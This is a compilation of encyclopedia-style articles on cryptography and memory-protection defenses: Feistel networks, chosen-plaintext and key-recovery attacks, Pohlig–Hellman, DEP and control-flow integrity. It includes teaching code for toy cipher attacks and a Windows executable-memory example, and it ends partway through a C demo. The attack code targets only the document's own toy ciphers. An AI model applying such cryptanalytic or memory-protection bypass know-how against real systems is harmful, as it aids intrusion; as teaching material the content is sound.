pseudorandom permutation (which means that it remains pseudorandom even to an adversary who getsoracleaccess to its inverse permutation).[4]Because of this very important result of Luby and Rackoff, Feistel ciphers are sometimes called Luby–Rackoff block ciphers. Further theoretical work has generalized the construction somewhat and given more precise bounds for security.[5][6] LetF{\displaystyle \mathrm {F} }be the round function and letK0,K1,…,Kn{\displaystyle K_{0},K_{1},\ldots ,K_{n}}be the sub-keys for the rounds0,1,…,n{\displaystyle 0,1,\ldots ,n}respectively. Then the basic operation is as follows: Split the plaintext block into two equal pieces: (L0{\displaystyle L_{0}},R0{\displaystyle R_{0}}). 
For each round i = 0, 1, …, n, compute

L_{i+1} = R_i
R_{i+1} = L_i ⊕ F(R_i, K_i)

where ⊕ means XOR. Then the ciphertext is (R_{n+1}, L_{n+1}). Decryption of a ciphertext (R_{n+1}, L_{n+1}) is accomplished by computing, for i = n, n−1, …, 0,

R_i = L_{i+1}
L_i = R_{i+1} ⊕ F(L_{i+1}, K_i)

Then (L_0, R_0) is the plaintext again. The diagram illustrates both encryption and decryption. Note the reversal of the subkey order for decryption; this is the only difference between encryption and decryption.

Unbalanced Feistel ciphers use a modified structure where L_0 and R_0 are not of equal lengths.[7] The Skipjack cipher is an example of such a cipher. The Texas Instruments digital signature transponder uses a proprietary unbalanced Feistel cipher to perform challenge–response authentication.[8]

The Thorp shuffle is an extreme case of an unbalanced Feistel cipher in which one side is a single bit. This has better provable security than a balanced Feistel cipher but requires more rounds.[9]

The Feistel construction is also used in cryptographic algorithms other than block ciphers. For example, the optimal asymmetric encryption padding (OAEP) scheme uses a simple Feistel network to randomize ciphertexts in certain asymmetric-key encryption schemes. A generalized Feistel algorithm can be used to create strong permutations on small domains of size not a power of two (see format-preserving encryption).[9]

Whether the entire cipher is a Feistel cipher or not, Feistel-like networks can be used as a component of a cipher's design. For example, MISTY1 is a Feistel cipher using a three-round Feistel network in its round function, Skipjack is a modified Feistel cipher using a Feistel network in its G permutation, and Threefish (part of Skein) is a non-Feistel block cipher that uses a Feistel-like MIX function.

Feistel or modified Feistel: Generalised Feistel:
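Below is a minimal Python sketch of the round structure described above, using a truncated SHA-256 as a stand-in round function (any keyed function works, since the construction never inverts it) and a toy 16-round key schedule. This is not a real cipher, only an illustration that decryption is encryption with the subkey order reversed.

```python
import hashlib

def round_function(half, subkey):
    # Any keyed function will do -- it does not need to be invertible.
    return hashlib.sha256(subkey + half).digest()[: len(half)]

def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

def feistel_encrypt(block, subkeys):
    left, right = block[: len(block) // 2], block[len(block) // 2 :]
    for k in subkeys:
        left, right = right, xor(left, round_function(right, k))
    return right + left          # ciphertext is (R_{n+1}, L_{n+1})

def feistel_decrypt(block, subkeys):
    # Identical structure, with the subkey order reversed.
    return feistel_encrypt(block, list(reversed(subkeys)))

subkeys = [bytes([i]) * 4 for i in range(16)]   # toy key schedule
plaintext = b"16-byte message!"
ciphertext = feistel_encrypt(plaintext, subkeys)
assert feistel_decrypt(ciphertext, subkeys) == plaintext
print(ciphertext.hex())
```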
https://en.wikipedia.org/wiki/Feistel_network
In computer science, an online algorithm measures its competitiveness against different adversary models. For deterministic algorithms, the adversary is the same as the adaptive offline adversary. For randomized online algorithms, competitiveness can depend upon the adversary model used.

The three common adversaries are the oblivious adversary, the adaptive online adversary, and the adaptive offline adversary. The oblivious adversary is sometimes referred to as the weak adversary. This adversary knows the algorithm's code, but does not get to know the randomized results of the algorithm. The adaptive online adversary is sometimes called the medium adversary. This adversary must make its own decision before it is allowed to know the decision of the algorithm. The adaptive offline adversary is sometimes called the strong adversary. This adversary knows everything, even the random number generator. This adversary is so strong that randomization does not help against it.

From S. Ben-David, A. Borodin, R. Karp, G. Tardos, A. Wigderson we have:
https://en.wikipedia.org/wiki/Adversarial_model#Existential_forgery
Achosen-plaintext attack(CPA) is anattack modelforcryptanalysiswhich presumes that the attacker can obtain theciphertextsfor arbitraryplaintexts.[1]The goal of the attack is to gain information that reduces the security of theencryptionscheme.[2] Modern ciphers aim to provide semantic security, also known asciphertext indistinguishability under chosen-plaintext attack, and they are therefore, by design, generally immune to chosen-plaintext attacks if correctly implemented. In a chosen-plaintext attack theadversarycan (possiblyadaptively) ask for the ciphertexts of arbitrary plaintext messages. This is formalized by allowing the adversary to interact with an encryptionoracle, viewed as ablack box. The attacker’s goal is to reveal all or a part of the secret encryption key. It may seem infeasible in practice that an attacker could obtain ciphertexts for given plaintexts. However, modern cryptography is implemented in software or hardware and is used for a diverse range of applications; for many cases, a chosen-plaintext attack is often very feasible (see alsoIn practice). Chosen-plaintext attacks become extremely important in the context ofpublic key cryptographywhere the encryption key is public and so attackers can encrypt any plaintext they choose. There are two forms of chosen-plaintext attacks: A general batch chosen-plaintext attack is carried out as follows[failed verification]: Consider the following extension of the above situation. After the last step, A cipher hasindistinguishable encryptions under a chosen-plaintext attackif after running the above experiment the adversary can't guess correctly (b=b') with probability non-negligiblybetter than 1/2.[3] The following examples demonstrate how some ciphers that meet other security definitions may be broken with a chosen-plaintext attack. The following attack on theCaesar cipherallows full recovery of the secret key: With more intricate or complex encryption methodologies the decryption method becomes more resource-intensive, however, the core concept is still relatively the same. The following attack on aone-time padallows full recovery of the secret key. Suppose the message length and key length are equal ton. While the one-time pad is used as an example of aninformation-theoretically securecryptosystem, this security only holds under security definitions weaker than CPA security. This is because under the formal definition of CPA security the encryption oracle has no state. This vulnerability may not be applicable to all practical implementations – the one-time pad can still be made secure if key reuse is avoided (hence the name "one-time" pad). InWorld War IIUS Navy cryptanalysts discovered that Japan was planning to attack a location referred to as "AF". They believed that "AF" might beMidway Island, because other locations in theHawaiian Islandshad codewords that began with "A". To prove their hypothesis that "AF" corresponded to "Midway Island" they asked the US forces at Midway to send a plaintext message about low supplies. The Japanese intercepted the message and immediately reported to their superiors that "AF" was low on water, confirming the Navy's hypothesis and allowing them to position their force to win thebattle.[3][4] Also duringWorld War II, Allied codebreakers atBletchley Parkwould sometimes ask theRoyal Air Forceto lay mines at a position that didn't have any abbreviations or alternatives in the German naval system's grid reference. 
The hope was that the Germans, seeing the mines, would use an Enigma machine to encrypt a warning message about the mines and an "all clear" message after they were removed, giving the Allies enough information about the message to break the German naval Enigma. This process of planting a known plaintext was called gardening.[5] Allied codebreakers also helped craft messages sent by double agent Juan Pujol García, whose encrypted radio reports were received in Madrid, manually decrypted, and then re-encrypted with an Enigma machine for transmission to Berlin.[6] This helped the codebreakers decrypt the code used on the second leg, having supplied the original text.[7]

In modern day, chosen-plaintext attacks (CPAs) are often used to break symmetric ciphers. To be considered CPA-secure, the symmetric cipher must not be vulnerable to chosen-plaintext attacks. Thus, it is important for symmetric cipher implementors to understand how an attacker would attempt to break their cipher and make relevant improvements.

For some chosen-plaintext attacks, only a small part of the plaintext may need to be chosen by the attacker; such attacks are known as plaintext injection attacks.

A chosen-plaintext attack is more powerful than a known-plaintext attack, because the attacker can directly target specific terms or patterns without having to wait for these to appear naturally, allowing faster gathering of data relevant to cryptanalysis. Therefore, any cipher that prevents chosen-plaintext attacks is also secure against known-plaintext and ciphertext-only attacks. However, a chosen-plaintext attack is less powerful than a chosen-ciphertext attack, where the attacker can obtain the plaintexts of arbitrary ciphertexts. A CCA attacker can sometimes break a CPA-secure system.[3] For example, the ElGamal cipher is secure against chosen-plaintext attacks, but vulnerable to chosen-ciphertext attacks because it is unconditionally malleable.
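The Caesar-cipher attack sketched earlier in this entry can be written as a few lines of Python: the adversary queries an encryption oracle with a chosen letter and reads the shift directly off the returned ciphertext. The oracle construction and names are illustrative only.

```python
import random
import string

ALPHABET = string.ascii_lowercase

def make_caesar_oracle():
    key = random.randrange(26)            # the secret shift
    def encrypt(plaintext):
        return "".join(ALPHABET[(ALPHABET.index(c) + key) % 26] for c in plaintext)
    return encrypt, key

oracle, secret = make_caesar_oracle()

# Chosen-plaintext attack: submit a known letter, then read off the shift.
ciphertext = oracle("a")
recovered = (ALPHABET.index(ciphertext) - ALPHABET.index("a")) % 26
print(recovered == secret)   # True -- one chosen plaintext recovers the key
```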
https://en.wikipedia.org/wiki/Chosen-plaintext_attack
A key-recovery attack is an adversary's attempt to recover the cryptographic key of an encryption scheme. Normally this means that the attacker has a pair, or more than one pair, of plaintext message and the corresponding ciphertext.[1]: 52 Historically, cryptanalysis of block ciphers has focused on key recovery, but security against these sorts of attacks is a very weak guarantee, since it may not be necessary to recover the key to obtain partial information about the message or to decrypt the message entirely.[1]: 52 Modern cryptography uses more robust notions of security. Recently, indistinguishability under adaptive chosen-ciphertext attack (IND-CCA2 security) has become the "golden standard" of security.[2]: 566 The most obvious key-recovery attack is the exhaustive key-search attack, but modern ciphers often have a key space of size 2^128 or greater, making such attacks infeasible with current technology.

In cryptography, the key-recovery advantage (KR advantage) of a particular algorithm is a measure of how effectively the algorithm can mount a key-recovery attack. Consequently, the maximum key-recovery advantage attainable by any algorithm with a fixed amount of computational resources is a measure of how difficult it is to recover a cipher's key. It is defined as the probability that the adversary algorithm can guess a cipher's randomly selected key, given a fixed amount of computational resources.[3] An extremely low KR advantage is essential for an encryption scheme's security.
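A toy illustration of the exhaustive key-search attack: the sketch below uses a deliberately weak XOR cipher with a 2-byte key so that the 2^16-element key space can actually be enumerated. The cipher and key size are illustrative assumptions, not a real scheme.

```python
import os
from itertools import product

def toy_encrypt(key, plaintext):
    """Toy cipher: XOR with a repeating 2-byte key (deliberately weak)."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(plaintext))

# The attacker holds one known plaintext/ciphertext pair.
secret_key = os.urandom(2)
plaintext = b"attack at dawn"
ciphertext = toy_encrypt(secret_key, plaintext)

# Exhaustive key search over all 2^16 possible keys.
for candidate in product(range(256), repeat=2):
    key = bytes(candidate)
    if toy_encrypt(key, plaintext) == ciphertext:
        print("recovered key:", key.hex(), key == secret_key)
        break
```

For a real 128-bit key space the same loop would need about 2^127 trials on average, which is the sense in which exhaustive search is infeasible.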
https://en.wikipedia.org/wiki/Key_recovery_attack
Ingroup theory, thePohlig–Hellman algorithm, sometimes credited as theSilver–Pohlig–Hellman algorithm,[1]is a special-purposealgorithmfor computingdiscrete logarithmsin afinite abelian groupwhose order is asmooth integer. The algorithm was introduced by Roland Silver, but first published byStephen PohligandMartin Hellman, who credit Silver with its earlier independent but unpublished discovery. Pohlig and Hellman also list Richard Schroeppel and H. Block as having found the same algorithm, later than Silver, but again without publishing it.[2] As an important special case, which is used as a subroutine in the general algorithm (see below), the Pohlig–Hellman algorithm applies togroupswhose order is aprime power. The basic idea of this algorithm is to iteratively compute thep{\displaystyle p}-adic digits of the logarithm by repeatedly "shifting out" all but one unknown digit in the exponent, and computing that digit by elementary methods. (Note that for readability, the algorithm is stated for cyclic groups — in general,G{\displaystyle G}must be replaced by the subgroup⟨g⟩{\displaystyle \langle g\rangle }generated byg{\displaystyle g}, which is always cyclic.) The algorithm computes discrete logarithms in time complexityO(ep){\displaystyle O(e{\sqrt {p}})}, far better than thebaby-step giant-step algorithm'sO(pe){\displaystyle O({\sqrt {p^{e}}})}whene{\displaystyle e}is large. In this section, we present the general case of the Pohlig–Hellman algorithm. The core ingredients are the algorithm from the previous section (to compute a logarithm modulo each prime power in the group order) and theChinese remainder theorem(to combine these to a logarithm in the full group). (Again, we assume the group to be cyclic, with the understanding that a non-cyclic group must be replaced by the subgroup generated by the logarithm's base element.) The correctness of this algorithm can be verified via theclassification of finite abelian groups: Raisingg{\displaystyle g}andh{\displaystyle h}to the power ofn/piei{\displaystyle n/p_{i}^{e_{i}}}can be understood as the projection to the factor group of orderpiei{\displaystyle p_{i}^{e_{i}}}. The worst-case input for the Pohlig–Hellman algorithm is a group of prime order: In that case, it degrades to thebaby-step giant-step algorithm, hence the worst-case time complexity isO(n){\displaystyle {\mathcal {O}}({\sqrt {n}})}. However, it is much more efficient if the order is smooth: Specifically, if∏ipiei{\displaystyle \prod _{i}p_{i}^{e_{i}}}is the prime factorization ofn{\displaystyle n}, then the algorithm's complexity isO(∑iei(log⁡n+pi)){\displaystyle {\mathcal {O}}\left(\sum _{i}{e_{i}(\log n+{\sqrt {p_{i}}})}\right)}group operations.[3]
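Below is a compact Python sketch of the algorithm as described above: each prime-power component of the group order is handled digit by digit, the small prime-order sub-logarithms are done by brute force here rather than baby-step giant-step (purely for brevity), and the partial results are combined with the Chinese remainder theorem. The modulus 8101, whose multiplicative group has smooth order 8100 = 2^2 · 3^4 · 5^2, and the exponent 7531 are illustrative choices.

```python
def factorize(n):
    """Trial-division factorization: {prime: exponent}."""
    factors, d = {}, 2
    while d * d <= n:
        while n % d == 0:
            factors[d] = factors.get(d, 0) + 1
            n //= d
        d += 1
    if n > 1:
        factors[n] = factors.get(n, 0) + 1
    return factors

def dlog_bruteforce(g, h, order, mod):
    """Discrete log in a small prime-order subgroup: find x with g^x = h (mod mod)."""
    acc = 1
    for x in range(order):
        if acc == h:
            return x
        acc = acc * g % mod
    raise ValueError("no solution")

def dlog_prime_power(g, h, p, e, mod):
    """Discrete log of h to base g, where g has order p^e (mod mod),
    recovered one base-p digit at a time ("shifting out" the known digits)."""
    x = 0
    gamma = pow(g, p ** (e - 1), mod)        # an element of order p
    for k in range(e):
        shifted = pow(pow(g, -x, mod) * h % mod, p ** (e - 1 - k), mod)
        x += dlog_bruteforce(gamma, shifted, p, mod) * p ** k
    return x

def pohlig_hellman(g, h, n, mod):
    """Solve g^x = h (mod mod), where g generates a cyclic group of smooth order n."""
    congruences = []
    for p, e in factorize(n).items():
        pe = p ** e
        g_i, h_i = pow(g, n // pe, mod), pow(h, n // pe, mod)  # project to order-p^e subgroup
        congruences.append((dlog_prime_power(g_i, h_i, p, e, mod), pe))
    x, m = 0, 1                              # Chinese remainder theorem
    for r, pe in congruences:
        x += m * ((r - x) * pow(m, -1, pe) % pe)
        m *= pe
    return x % n

# Toy example: 8101 is prime, so its multiplicative group has smooth order 8100.
p_mod, n = 8101, 8100
primes = list(factorize(n))
g = next(a for a in range(2, p_mod)
         if all(pow(a, n // q, p_mod) != 1 for q in primes))   # find a generator
secret = 7531
h = pow(g, secret, p_mod)
print(pohlig_hellman(g, h, n, p_mod) == secret)   # True
```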
https://en.wikipedia.org/wiki/Pohlig%E2%80%93Hellman_algorithm
Incomputer security,executable-space protectionmarksmemoryregions as non-executable, such that an attempt to executemachine codein these regions will cause anexception. It relies on hardware features such as theNX bit(no-execute bit), or on software emulation when hardware support is unavailable. Software emulation often introduces a performance cost, oroverhead(extra processing time or resources), while hardware-based NX bit implementations have no measurable performance impact. Early systems like theBurroughs 5000, introduced in 1961, implemented executable-space protection using atagged architecture(memory tagging to distinguish code from data), a precursor to modern NX bit technology. Today, operating systems use executable-space protection to mark writable memory areas, such as thestackandheap, as non-executable, helping to preventbuffer overflowexploits. These attacks rely on some part of memory, usually the stack, being both writable and executable; if it is not, the attack fails. Many operating systems implement or have an available executable space protection policy. Here is a list of such systems in alphabetical order, each with technologies ordered from newest to oldest. A technology supplying Architecture Independentemulationwill be functional on all processors which aren't hardware supported. The "Other Supported" line is for processors which allow some grey-area method, where an explicit NX bit doesn't exist yet hardware allows one to be emulated in some way. As ofAndroid2.3 and later, architectures which support it have non-executable pages by default, including non-executable stack and heap.[1][2][3] Initial support for theNX bit, onx86-64andIA-32processors that support it, first appeared inFreeBSD-CURRENT on June 8, 2004. It has been in FreeBSD releases since the 5.3 release. TheLinux kernelsupports the NX bit onx86-64andIA-32processors that support it, such as modern 64-bit processors made by AMD, Intel, Transmeta and VIA. The support for this feature in the 64-bit mode on x86-64 CPUs was added in 2004 byAndi Kleen, and later the same year,Ingo Molnáradded support for it in 32-bit mode on 64-bit CPUs. These features have been part of theLinux kernel mainlinesince the release of kernel version 2.6.8 in August 2004.[4] The availability of the NX bit on 32-bit x86 kernels, which may run on both 32-bit x86 CPUs and 64-bit IA-32-compatible CPUs, is significant because a 32-bit x86 kernel would not normally expect the NX bit that anAMD64orIA-64supplies; the NX enabler patch assures that these kernels will attempt to use the NX bit if present. Some desktopLinux distributions, such asFedora,UbuntuandopenSUSE, do not enable the HIGHMEM64 option by default in their default kernels, which is required to gain access to the NX bit in 32-bit mode, because thePAEmode that is required to use the NX bit causes boot failures on pre-Pentium Pro(including Pentium MMX) andCeleron MandPentium Mprocessors without NX support. Other processors that do not support PAE areAMD K6and earlier,Transmeta Crusoe,VIA C3and earlier, andGeodeGX and LX.VMware Workstationversions older than 4.0,Parallels Workstationversions older than 4.0, andMicrosoft Virtual PCandVirtual Serverdo not support PAE on the guest. Fedora Core 6 and Ubuntu 9.10 and later provide a kernel-PAE package which supports PAE and NX. NX memory protection has always been available in Ubuntu for any systems that had the hardware to support it and ran the 64-bit kernel or the 32-bit server kernel. 
The 32-bit PAE desktop kernel (linux-image-generic-pae) in Ubuntu 9.10 and later, also provides the PAE mode needed for hardware with the NX CPU feature. For systems that lack NX hardware, the 32-bit kernels now provide an approximation of the NX CPU feature via software emulation that can help block many exploits an attacker might run from stack or heap memory. Non-execute functionality has also been present for other non-x86 processors supporting this functionality for many releases. Red Hatkernel developerIngo Molnárreleased a Linux kernel patch namedExec Shieldto approximate and utilize NX functionality on32-bitx86 CPUs. The Exec Shield patch was released to theLinux kernel mailing liston May 2, 2003, but was rejected for merging with the base kernel because it involved some intrusive changes to core code in order to handle the complex parts of the emulation. Exec Shield's legacy CPU support approximates NX emulation by tracking the upper code segment limit. This imposes only a few cycles of overhead during context switches, which is for all intents and purposes immeasurable. For legacy CPUs without an NX bit, Exec Shield fails to protect pages below the code segment limit; an mprotect() call to mark higher memory, such as the stack, executable will mark all memory below that limit executable as well. Thus, in these situations, Exec Shield's schemes fails. This is the cost of Exec Shield's low overhead. Exec Shield checks for twoELFheader markings, which dictate whether the stack or heap needs to be executable. These are called PT_GNU_STACK and PT_GNU_HEAP respectively. Exec Shield allows these controls to be set for both binary executables and for libraries; if an executable loads a library requiring a given restriction relaxed, the executable will inherit that marking and have that restriction relaxed. The PaX NX technology can emulate NX functionality, or use a hardware NX bit. PaX works on x86 CPUs that do not have the NX bit, such as 32-bit x86. The Linuxkernelstill does not ship with PaX (as of May, 2007); the patch must be merged manually. PaX provides two methods of NX bit emulation, called SEGMEXEC and PAGEEXEC. The SEGMEXEC method imposes a measurable but low overhead, typically less than 1%, which is a constant scalar incurred due to the virtual memory mirroring used for the separation between execution and data accesses.[5]SEGMEXEC also has the effect of halving the task's virtual address space, allowing the task to access less memory than it normally could. This is not a problem until the task requires access to more than half the normal address space, which is rare. SEGMEXEC does not cause programs to use more system memory (i.e. RAM), it only restricts how much they can access. On 32-bit CPUs, this becomes 1.5 GB rather than 3 GB. PaX supplies a method similar to Exec Shield's approximation in the PAGEEXEC as a speedup; however, when higher memory is marked executable, this method loses its protections. In these cases, PaX falls back to the older, variable-overhead method used by PAGEEXEC to protect pages below the CS limit, which may become quite a high-overhead operation in certainmemory access patterns. When the PAGEEXEC method is used on a CPU supplying a hardware NX bit, the hardware NX bit is used, thus no significant overhead is incurred. PaX supplies mprotect() restrictions to prevent programs from marking memory in ways that produce memory useful for a potentialexploit. 
PaX's mprotect() restriction policy causes certain applications to cease to function, but it can be disabled for affected programs. PaX allows the individual features of the technology to be enabled or disabled separately for each binary executable. PaX ignores both PT_GNU_STACK and PT_GNU_HEAP. In the past, PaX had a configuration option to honor these settings, but that option has been removed for security reasons, as it was deemed not useful. The same results of PT_GNU_STACK can normally be attained by disabling mprotect() restrictions, as the program will normally mprotect() the stack on load. This may not always be true; for situations where this fails, simply disabling both PAGEEXEC and SEGMEXEC will effectively remove all executable space restrictions, giving the task the same protections on its executable space as a non-PaX system. macOS for Intel supports the NX bit on all CPUs supported by Apple (from Mac OS X 10.4.4, the first Intel release, onwards). Mac OS X 10.4 only supported NX stack protection. In Mac OS X 10.5, all 64-bit executables have an NX stack and heap (W^X protection). This includes x86-64 (Core 2 or later) and 64-bit PowerPC on the G5 Macs. As of NetBSD 2.0 and later (December 9, 2004), architectures which support it have a non-executable stack and heap.[6] Architectures that have per-page granularity are: alpha, amd64, hppa, i386 (with PAE), powerpc (ibm4xx), sh5, sparc (sun4m, sun4d), and sparc64. Architectures that can only support these with region granularity are: i386 (without PAE) and other powerpc (such as macppc). Other architectures do not benefit from a non-executable stack or heap; NetBSD does not by default use any software emulation to offer these features on those architectures. A technology in the OpenBSD operating system, known as W^X, marks writable pages by default as non-executable on processors that support it. On 32-bit x86 processors, the code segment is set to include only part of the address space, to provide some level of executable space protection. OpenBSD 3.3 shipped May 1, 2003, and was the first release to include W^X. Solaris has supported globally disabling stack execution on SPARC processors since Solaris 2.6 (1997); in Solaris 9 (2002), support for disabling stack execution on a per-executable basis was added. The first implementation of a non-executable stack for Windows (NT 4.0, 2000 and XP) was published by SecureWave via their SecureStack product in 2001, based on the work of PaX.[7][8] Starting with Windows XP Service Pack 2 (2004) and Windows Server 2003 Service Pack 1 (2005), the NX features were implemented for the first time on the x86 architecture. Executable space protection on Windows is called "Data Execution Prevention" (DEP). Under Windows XP or Server 2003, NX protection was used by default only on critical Windows services. If the x86 processor supported this feature in hardware, then the NX features were turned on automatically in Windows XP/Server 2003 by default. If the feature was not supported by the x86 processor, then no protection was given. Early implementations of DEP provided no address space layout randomization (ASLR), which allowed potential return-to-libc attacks that could have been feasibly used to disable DEP during an attack.[9] The PaX documentation elaborates on why ASLR is necessary;[10] a proof-of-concept was produced detailing a method by which DEP could be circumvented in the absence of ASLR.[11] It may be possible to develop a successful attack if the address of prepared data such as corrupted images or MP3s can be known by the attacker.
Microsoft added ASLR functionality inWindows VistaandWindows Server 2008. On this platform, DEP is implemented through the automatic use ofPAEkernelin 32-bit Windows and the native support on 64-bit kernels. Windows Vista DEP works by marking certain parts of memory as being intended to hold only data, which the NX or XD bit enabled processor then understands as non-executable.[12]In Windows, from version Vista, whether DEP is enabled or disabled for a particular process can be viewed on theProcesses/Detailstab in theWindows Task Manager. Windows implements software DEP (without the use of theNX bit) through Microsoft's "SafeStructured Exception Handling" (SafeSEH). For properly compiled applications, SafeSEH checks that, when an exception is raised during program execution, the exception's handler is one defined by the application as it was originally compiled. The effect of this protection is that an attacker is not able to add his own exception handler which he has stored in a data page through unchecked program input.[12][13] When NX is supported, it is enabled by default. Windows allows programs to control which pages disallow execution through itsAPIas well as through the section headers in aPE file. In the API, runtime access to the NX bit is exposed through theWin32API callsVirtualAlloc[Ex]andVirtualProtect[Ex]. Each page may be individually flagged as executable or non-executable. Despite the lack of previous x86 hardware support, both executable and non-executable page settings have been provided since the beginning. On pre-NX CPUs, the presence of the 'executable' attribute has no effect. It was documented as if it did function, and, as a result, most programmers used it properly. In the PE file format, each section can specify its executability. The execution flag has existed since the beginning of the format and standardlinkershave always used this flag correctly, even long before the NX bit. Because of this, Windows is able to enforce the NX bit on old programs. Assuming the programmer complied with "best practices", applications should work correctly now that NX is actually enforced. Only in a few cases have there been problems; Microsoft's own .NET Runtime had problems with the NX bit and was updated. In Microsoft'sXbox, although the CPU does not have the NX bit, newer versions of theXDKset the code segment limit to the beginning of the kernel's.datasection (no code should be after this point in normal circumstances). Starting with version 51xx, this change was also implemented into the kernel of new Xboxes. This broke the techniques old exploits used to become aterminate-and-stay-resident program. However, new exploits were quickly released supporting this new kernel version because the fundamental vulnerability in the Xbox kernel was unaffected. Where code is written and executed at runtime—aJIT compileris a prominent example—the compiler can potentially be used to produce exploit code (e.g. usingJIT Spray) that has been flagged for execution and therefore would not be trapped.[14][15] Return-oriented programmingcan allow an attacker to execute arbitrary code even when executable space protection is enforced.
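As a hedged illustration of the API behavior described above, the following C sketch (x86-64 Windows assumed; the stub simply returns 7) shows the DEP-compatible allocation pattern a JIT compiler can follow: generate code into a PAGE_READWRITE buffer, then call VirtualProtect to change it to PAGE_EXECUTE_READ before executing it, so that no page is ever writable and executable at the same time.

/* Sketch of a DEP-friendly code-generation pattern on Windows using the
 * VirtualAlloc/VirtualProtect calls described above. The generated stub is
 * x86-64 machine code for: mov eax, 7; ret. */
#include <windows.h>
#include <stdio.h>
#include <string.h>

int main(void) {
    static const unsigned char stub[] = { 0xB8, 0x07, 0x00, 0x00, 0x00, 0xC3 };

    SIZE_T size = 4096;
    void *buf = VirtualAlloc(NULL, size, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    if (!buf) return 1;

    memcpy(buf, stub, sizeof stub);             /* "compile" into the buffer */

    DWORD oldProt;
    if (!VirtualProtect(buf, size, PAGE_EXECUTE_READ, &oldProt))
        return 1;                               /* make executable, drop write */

    int (*fn)(void) = (int (*)(void))buf;
    printf("generated code returned %d\n", fn());

    VirtualFree(buf, 0, MEM_RELEASE);
    return 0;
}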
https://en.wikipedia.org/wiki/Data_Execution_Prevention
Control-flow integrity (CFI) is a general term for computer security techniques that prevent a wide variety of malware attacks from redirecting the flow of execution (the control flow) of a program. A computer program commonly changes its control flow to make decisions and use different parts of the code. Such transfers may be direct, in that the target address is written in the code itself, or indirect, in that the target address itself is a variable in memory or a CPU register. In a typical function call, the program performs a direct call, but returns to the caller function using the stack – an indirect backward-edge transfer. When a function pointer is called, such as from a virtual table, we say there is an indirect forward-edge transfer.[1][2] Attackers seek to inject code into a program to make use of its privileges or to extract data from its memory space. Before executable code was commonly made read-only, an attacker could arbitrarily change the code as it is run, targeting direct transfers or even dispensing with transfers altogether. After W^X became widespread, an attacker instead wants to redirect execution to a separate, unprotected area containing the code to be run, making use of indirect transfers: one could overwrite the virtual table for a forward-edge attack or change the call stack for a backward-edge attack (return-oriented programming). CFI is designed to protect indirect transfers from going to unintended locations.[1] Associated techniques include code-pointer separation (CPS), code-pointer integrity (CPI), stack canaries, shadow stacks, and vtable pointer verification.[3][4][5] These protections can be classified as either coarse-grained or fine-grained based on the number of targets restricted. A coarse-grained forward-edge CFI implementation could, for example, restrict the set of indirect call targets to any function that may be indirectly called in the program, while a fine-grained one would restrict each indirect call site to functions that have the same type as the function to be called. Similarly, for a backward-edge scheme protecting returns, a coarse-grained implementation would only allow the procedure to return to a function of the same type (of which there could be many, especially for common prototypes), while a fine-grained one would enforce precise return matching (so it can return only to the function that called it). Related implementations are available in Clang (LLVM in general),[6] Microsoft's Control Flow Guard[7][8][9] and Return Flow Guard,[10] Google's Indirect Function-Call Checks[11] and Reuse Attack Protector (RAP).[12][13] LLVM/Clang provides a "CFI" option that works on the forward edge by checking for errors in virtual tables and type casts. It depends on link-time optimization (LTO) to know what functions are supposed to be called in normal cases.[14] There is a separate "shadow call stack" scheme that defends on the backward edge by checking for call stack modifications, available only for aarch64.[15] Google has shipped Android with the Linux kernel compiled by Clang with link-time optimization (LTO) and CFI since 2018.[16] SCS is available for the Linux kernel as an option, including on Android.[17] Intel Control-flow Enforcement Technology (CET) detects compromises to control-flow integrity with a shadow stack (SS) and indirect branch tracking (IBT).[18][19] The kernel must map a region of memory for the shadow stack that is not writable by user-space programs except through special instructions. The shadow stack stores a copy of the return address of each CALL.
On a RET, the processor checks whether the return addresses stored on the normal stack and the shadow stack are equal. If the addresses are not equal, the processor generates an INT #21 (Control Flow Protection Fault). Indirect branch tracking detects indirect JMP or CALL instructions to unauthorized targets. It is implemented by adding a new internal state machine in the processor. The behavior of indirect JMP and CALL instructions is changed so that they switch the state machine from IDLE to WAIT_FOR_ENDBRANCH. In the WAIT_FOR_ENDBRANCH state, the next instruction to be executed is required to be the new ENDBRANCH instruction (ENDBR32 in 32-bit mode or ENDBR64 in 64-bit mode), which changes the internal state machine from WAIT_FOR_ENDBRANCH back to IDLE. Thus every authorized target of an indirect JMP or CALL must begin with ENDBRANCH. If the processor is in a WAIT_FOR_ENDBRANCH state (meaning the previous instruction was an indirect JMP or CALL) and the next instruction is not an ENDBRANCH instruction, the processor generates an INT #21 (Control Flow Protection Fault). On processors not supporting CET indirect branch tracking, ENDBRANCH instructions are interpreted as NOPs and have no effect. Control Flow Guard (CFG) was first released for Windows 8.1 Update 3 (KB3000850) in November 2014. Developers can add CFG to their programs by adding the /guard:cf linker flag before program linking in Visual Studio 2015 or newer.[20] As of Windows 10 Creators Update (Windows 10 version 1703), the Windows kernel is compiled with CFG.[21] The Windows kernel uses Hyper-V to prevent malicious kernel code from overwriting the CFG bitmap.[22] CFG operates by creating a per-process bitmap, where a set bit indicates that the address is a valid destination. Before performing each indirect function call, the application checks whether the destination address is in the bitmap. If the destination address is not in the bitmap, the program terminates.[20] This makes it more difficult for an attacker to exploit a use-after-free by replacing an object's contents and then using an indirect function call to execute a payload.[23] For all protected indirect function calls, the _guard_check_icall function is called, which performs a series of checks to validate the call target.[24] Several generic techniques for bypassing CFG have nevertheless been demonstrated. eXtended Flow Guard (XFG) has not been officially released yet, but is available in the Windows Insider preview and was publicly presented at Bluehat Shanghai in 2019.[29] XFG extends CFG by validating function call signatures to ensure that indirect function calls are only to the subset of functions with the same signature. Function call signature validation is implemented by adding instructions to store the target function's hash in register r10 immediately prior to the indirect call and storing the calculated function hash in the memory immediately preceding the target address's code. When the indirect call is made, the XFG validation function compares the value in r10 to the target function's stored hash.[30][31]
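The following sketch is not Microsoft's or LLVM's actual implementation, but it shows the kind of signature-mismatched indirect call that fine-grained forward-edge schemes such as Clang's CFI (and, via hash comparison, XFG) are designed to reject. The Clang flags in the comment are the documented way to enable CFI checking; the file and symbol names are illustrative.

/* A signature-mismatched indirect call of the kind fine-grained forward-edge
 * CFI is meant to stop. Built normally the call "works" by accident; built
 * with Clang's CFI instrumentation it is rejected at run time because the
 * call site's type and the target's type disagree:
 *
 *   clang -O2 -flto -fvisibility=hidden -fsanitize=cfi cfi_demo.c -o cfi_demo
 */
#include <stdio.h>

static int add(int a, int b) { return a + b; }

typedef void (*void_fn)(void);

int main(void) {
    /* Cast away the real signature of 'add'. A fine-grained scheme (Clang's
     * cfi-icall check, or XFG's hash comparison) flags the indirect call
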